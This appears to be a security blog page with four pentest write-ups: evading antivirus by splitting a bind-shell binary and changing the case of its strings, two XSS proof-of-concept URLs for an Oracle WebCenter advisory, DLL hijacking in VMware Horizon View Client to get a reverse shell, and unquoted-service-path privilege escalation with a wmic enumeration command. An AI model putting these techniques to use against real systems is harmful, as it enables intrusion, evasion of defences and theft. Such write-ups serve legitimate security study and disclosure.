Antivirus Evasion

A few weekends back i was wondering how do malware evade antivirus solutions, is it really that easy ?

With that in mind i started looking at some known malware piece and randomly pick a anti malware solutions to my surprise AVs can still be tricked with old technique such as string substitution method, so today we will explore this very well known technique. For testing purpose i choose ncx as a test malware which binds itself on port 99 and when someone connects to ncx it gives command prompt of the system.

First let’s scan the default malware to check if it’s detected or not.

 

 

 

 

 

 

 

 

 

 

 

 

As it can be seen in below screenshot that ncx is detected by our antivirus

 

Let’s split file into small chunks, after a bit of trial and error i found that splitting into 17 bytes does not break any signature of av, the trick here is we have to keep splitting files as long as the av keeps flagging those files

 

On scanning split chunks two detection were made by our av i.e chunk 1 and 4 were identified as malicious

 

 

Change lower case ‘cmd’ to upper case ‘CMD’ and save it

 

 

Yes no more detection !

 

 

In sixth line of split chunk number 1 let’s change upper case ‘S’ to lower case ‘s’ and save it

 

 

Scan it again, and av no longer detects this chunk.

 

 

Finally join files back

 

 

Rename the joined file

 

 

Scan shows no more detection 🙂

 

 

And we can see on execution it is indeed listening on port 99

 

 

POC Video:-

 

Oracle Web Center XSS

Oracle Web Center XSS
Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]

Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>

 


Solution
========================================================================================
Apply Oracle CPU July 2017

VMWare Horizon View Client <= 5.4 DLL Hijacking

During one of the pentest assignment i had to perform security assessment for VMWare Horizon View Client, since it’s native windows application the attack vectors are different than normal web apps. I started looking at the memory then traffic then registries found nothing, i was at a total loss…. Fortunately since it’s a native application it must require some dlls, so there are pretty good chances that developers might forgot to explicitly call dlls via complete path, what does that mean ? So lets say an application requires abc.dll and it just calls it by referring call abc.dll windows will look for abc.dll in following order:-

  • The directory from which the application loaded.
  • System directory (C:\Windows\Syswow64).
  • System directory (C:\Windows\System32).
  • The 16-bit system directory (C:\Windows\System).
  • The Windows directory (C:\Windows).
  • The Current Directory.
  • Directories that are listed in the PATH variables.

I fired up process minitor with following rules:-

Next i started the application to see which dlls are missing.

So As we can see that Trutil.dll is required by the application and it’s clearly missing

Once the application is launched we will get reverse shell….sweet!!!

 

 

Unquoted Service Path Privilege Escalation

During pentest engagement we often manage to get a shell (usually it’s enough to prove your point) but what if one can truly get a complete hold of system ?

So there are tons of privilege escalation techniques out there which includes exploiting kernel level bug, mis-configurations so on and so forth.

One of the ways to get elevated access is to exploit unquoted service paths of services running under high privileged user such as administrator or system account

The concept behind unquoted service is service path name contains white space windows assumes that anything before white space is the binary location and anything after that is argument, if it fails to to locate any binary there then it moves on to next directory defined in service path name, to make it more clear lets take a look at below example:-

C:\Program Files\Company Name\AppName Version\App_Binary.exe

when the service starts windows will first look for Programs.exe in C:\ if it does not find any binary named as Program.exe then it will look for Company.exe again if it finds any binary named Company.exe windows will execute it instead of orignal binary i.e App_Binary.exe

So in order to exploit this scenario following conditions must meet:-

1-Service running under high privileged account i.e administrator/system

2-Service path must contain white space

3-One must have write access to directories of the service/app.

For demo purpose Foxit PDF Reader version 7.0.6.1126

Download Link:- http://www.oldapps.com/foxit_reader.php?old_foxit_reader=15897?download

The following screenshot shows that we already have a limited access to system

The following wmic query stolen shamelessly from internet can help in identifying unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

with the help of cacls utility that we can enumerate permissions, which in our case provides append rights to unprivileged user which means one can create files in that directory.

Uploading file to directory….

Once the service is restarted it will execute our binary instead of intended one and provide us with elevated privileges.